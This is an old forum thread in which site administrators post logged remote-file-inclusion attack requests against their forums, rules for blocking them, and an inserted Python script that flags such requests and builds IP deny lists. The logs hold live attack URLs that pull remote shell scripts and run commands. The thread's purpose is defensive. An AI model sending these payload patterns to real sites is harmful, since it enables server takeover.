
Security Logs with Hacker IP's

Posted: Sat May 05, 2007 7:48 am
Author: Omni-Lee
1 01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.250.108
4 30 Apr 2007 02:33 pm /forum/profile.php?mode=http://www.alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 200.138.244.203
5 29 Apr 2007 11:18 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
6 29 Apr 2007 11:45 am /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
7 29 Apr 2007 11:45 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.18.93.107
8 29 Apr 2007 10:16 am /forum/profile.php?mode=http://www.zjkjw.gov.cn/tool25.txt?&cmd=id 200.181.152.9
9 29 Apr 2007 09:22 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.79.243
10 28 Apr 2007 10:29 pm /forum/profile.php?mode=http://www.Vel0zBR.xpg.com.br/Owner/cmd1.txt?&cmd=id 200.153.54.199
11 27 Apr 2007 06:23 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.2.78.239
12 26 Apr 2007 06:44 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 200.97.25.94
13 25 Apr 2007 11:19 pm /forum/profile.php?mode=http://br.geocities.com/ngrdownz/list.txt?&cmd=id 213.22.52.189
14 25 Apr 2007 11:10 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137
15 25 Apr 2007 07:49 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137

Note: Any time I tried to add one of those addresses to the agent blocker it would break the site. CrackerTracker would throw a bunch of code lines at the top of the page.

Re: Security Logs with Hacker IP's

Posted: Thu May 10, 2007 4:30 pm
Author: Omni-Lee
Thought I'd add a few more.

1 08 May 2007 07:16 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.67.182.247
2 08 May 2007 05:11 pm /forum/profile.php?mode=http://www.freewebs.com/dropcmd/tool25.dat?&cmd=id 189.13.156.90
3 08 May 2007 11:20 am /forum/profile.php?mode=http://dropcmd.netfast.org/tool25.txt?&cmd=id 201.9.15.12
4 08 May 2007 01:17 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 189.13.114.100
5 07 May 2007 11:54 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.9.96.227
6 06 May 2007 09:21 pm /forum/profile.php?mode=http://www.tools25.kit.net/tool25.dat?&cmd=id 201.8.90.148

Re: Security Logs with Hacker IP's

Posted: Tue Jul 03, 2007 9:10 pm
Author: CaNNon
Have you run into this tool yet?

http://securityjobs.us/xpl/tembak.txt?

I think this one gets through, but I'm not 100% sure.
I have 4 hits from it and the forum goes down to a .script kiddie pr message.

Re: Security Logs with Hacker IP's

Posted: Fri Jul 13, 2007 12:03 pm
Author: jomasaco
Good initiative Omni-Lee. I leave here my contribution.

201.50.228.87
04 Jul 2007 01:11 am /forum/IM141/profile.php?mode=http://www.butterbeidefische.de/DB59528/tool25.txt?&cmd=id
libwww-perl/5.69 217.110.144.106
13 Jul 2007 06:02 am /forum/postings_popup.php?t=69//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?
/forum/viewtopic.php?printertopic=1&t=9&start=0&postdays=0&postorder=asc&vote=viewresult//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?

Posted: Fri Jul 13, 2007 11:20 pm
Author: viragotech
I have been getting slammed with lots of similar stuff daily from about 10 different domains. Each day it's a whole new block of domains. But thank god none of them have worked, as they get caught and dumped as 403 errors.

Once I noticed, I did spend the first few days reporting sites and getting them shut down, but once I realized they change domains daily it doesn't make any sense and it's mucho work.

Though I have been editing my htaccess to block any traffic from said URLs ever again when they start the rotation of domains over at some point.

Re: Security Logs with Hacker IP's

Posted: Sun Jul 15, 2007 9:53 am
Author: CaNNon
Though I have been editing my htaccess to block any traffic from said URLs ever again when they start the rotation of domains over at some point.


I'm using the IPs, not the URLs. I know the IPs are proxies, but I figure I've a better chance to block. (Although that .script didn't work, the prox did... so if I block the prox I may well stop a run with a .script that does work.)

As soon as I get an attempt I add the IP to the htaccess; this creates an update to my proxy ban list. Also I have started adding " # date " (rem statements): once the prox is dead it could be removed from the list and help keep the htaccess file size down, as I think the file gets processed on every hit.
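The checks this thread applies by eye (a query parameter whose value is an absolute URL, a spliced //includes/ path, a cmd= parameter, the libwww-perl agent) and CaNNon's dated IP deny list, as an added Python example that is not code from the original thread or from CrackerTracker. The log layout, the indicator names and the benign fourth sample line are my assumptions; the other three sample lines are copied from the posts above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample input in the layout CrackerTracker uses in this thread:
#   "<n> <dd Mon yyyy hh:mm am|pm> <request> [<user-agent>] <client ip>"
# Lines 1-3 are copied from the posts above; line 4 is an invented benign hit
# so the filter has something to let through.
SAMPLE_LOG = """\
1 01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 13 Jul 2007 06:02 am /forum/postings_popup.php?t=69//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt? libwww-perl/5.69 217.110.144.106
4 01 May 2007 04:02 pm /forum/viewtopic.php?t=9&start=0 Mozilla/5.0 192.0.2.10
"""

LINE_RE = re.compile(
    r"^(?P<n>\d+)\s+"
    r"(?P<when>\d{2} \w{3} \d{4} \d{2}:\d{2} [ap]m)\s+"
    r"(?P<request>\S+)"
    r"(?:\s+(?P<ua>.+?))?\s+"          # user agent is optional in these logs
    r"(?P<ip>(?:\d{1,3}\.){3}\d{1,3})\s*$"
)

# A parameter whose value is an absolute http/https/ftp URL is the
# remote-file-inclusion signature seen throughout the thread.
RFI_RE = re.compile(r"(?P<param>[\w\[\]]+)=(?:https?|ftp)://(?P<target>[^\s&?]+)", re.I)


def classify(request, ua):
    """Return the indicators found in one request (empty list if it looks benign)."""
    indicators = []
    param = remote_host = None
    m = RFI_RE.search(request)
    if m:
        indicators.append("remote_url_in_param")
        param = m.group("param")
        remote_host = m.group("target").split("/", 1)[0].lower()
    if "//includes/" in request:
        # A path segment spliced in to reach an include file directly.
        indicators.append("include_path_in_request")
    cmd = dict(parse_qsl(urlsplit(request).query)).get("cmd")
    if cmd:
        indicators.append("cmd_param")
    if ua and ua.lower().startswith("libwww-perl"):
        indicators.append("libwww-perl_agent")
    return {"indicators": indicators, "param": param, "remote_host": remote_host, "cmd": cmd}


def analyze(log_text):
    """Parse every log line and keep only those carrying at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess
        fields = m.groupdict()
        info = classify(fields["request"], fields["ua"])
        if info["indicators"]:
            hits.append({**fields, **info})
    return hits


def deny_list(hits):
    """Render one 'Deny from' per offending IP, each preceded by a dated comment
    on its own line (Apache does not allow trailing comments) so stale entries
    can be pruned later, as the post above suggests."""
    first_seen = {}
    for h in hits:
        first_seen.setdefault(h["ip"], h["when"])
    lines = []
    for ip, when in sorted(first_seen.items()):
        lines.append(f"# first seen {when}")
        lines.append(f"Deny from {ip}")
    return "\n".join(lines)


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["remote_host"], h["cmd"], ",".join(h["indicators"]))
    print(deny_list(found))
```

The `Deny from` form matches the Apache 2.2 `Order allow,deny` style used elsewhere in this thread; on Apache 2.4 the equivalent is `Require not ip`.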

Re: Security Logs with Hacker IP's

Posted: Sun Jul 15, 2007 3:52 pm
Author: jomasaco
one more.
/forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

Re: Security Logs with Hacker IP's

Posted: Fri Jul 20, 2007 6:45 am
Author: Whisky
I've got serious attacks (hopefully blocked) several times a day on my portal!


62.60.137.49
Fri 20 Jul 2007, 5


This proves that people complaining here about the insecurity of IM or the inutility of CrackerTracker are just idiots, in my opinion.

Re: Security Logs with Hacker IP's

Posted: Fri Jul 20, 2007 12:04 pm
Author: CaNNon
Yeah, my logs look like that too. For all the trouble setting up CT, I've got to say it was worth it.

Re: Security Logs with Hacker IP's

Posted: Mon Jul 23, 2007 4:08 pm
Author: jomasaco
Still was not for this but should be barely... :P :P

These brutes do not have a life, do not eat, do not drink, do not sleep. I have there xxx but I find that also do not want.

Posted: Wed Jul 25, 2007 12:21 pm
Author: viragotech
Yep, I had to change domains and get a new host from all of that. I changed domains so they wouldn't just follow me to my new host, and had to get a new host because from so many hack attempts I was over my traffic limits for CGI.

Buddy just lost 3 of his 141 IM forums today. They deleted everything. He dunno how they got root access but all is gone.

Re: Security Logs with Hacker IP's

Posted: Wed Jul 25, 2007 7:18 pm
Author: CaNNon
Although I don't like doing this I have added this to my htaccess file. It's really cut back the number of runs on my forum.

jomasaco, I think you need to add it for sure!

RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]


So you need it to look like this in the htaccess file.

Code:
 RewriteEngine On
 # testing user agent blocking
 # no [OR] on this condition: that flag only joins it to a following RewriteCond
 RewriteCond %{HTTP_USER_AGENT} libwww-perl
 # end test
 RewriteRule ^.* - [F,L]


If RewriteEngine is already on, just add the first line in the quote; if not, add the whole code to the file so it will process it.

Re: Security Logs with Hacker IP's

Posted: Thu Jul 26, 2007 4:25 am
Author: Whisky
Code:
 RewriteEngine On
 # testing user agent blocking
 # no [OR] on this condition: that flag only joins it to a following RewriteCond
 RewriteCond %{HTTP_USER_AGENT} libwww-perl
 # end test
 RewriteRule ^.* - [F,L]



Definitely interesting, thank you.

Re: Security Logs with Hacker IP's

Posted: Fri Jul 27, 2007 8:16 pm
Author: CaNNon
NP Whisky, day 4 since I added that myself. On a side note, it's been nice and quiet.

Posted: Fri Aug 17, 2007 12:47 pm
Author: Pflegen
When my IM site got hit a while back, I ended up blocking URLs with "/includes" or "/function*" in them.

Note: I also turned off allow_url_fopen in the php.ini.

.htaccess or httpd.conf
===============

# <Files> takes a file name or regex argument, which is not shown in the post;
# it matches the file's name on disk, not the request URL.
<Files>
Order allow,deny
Deny from all
</Files>

# Second block, same form, for the other pattern the post mentions.
<Files>
Order allow,deny
Deny from all
</Files>



We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

[Fri Aug 17 15:06:54 2007] [error] [client 203.32.125.78] client denied by server configuration: /websites/HG/html/includes/functions_portal.php


I like the URL rewrite as well, though. I may consider that as a follow-up to catch the others that aren't using the include or function* paths.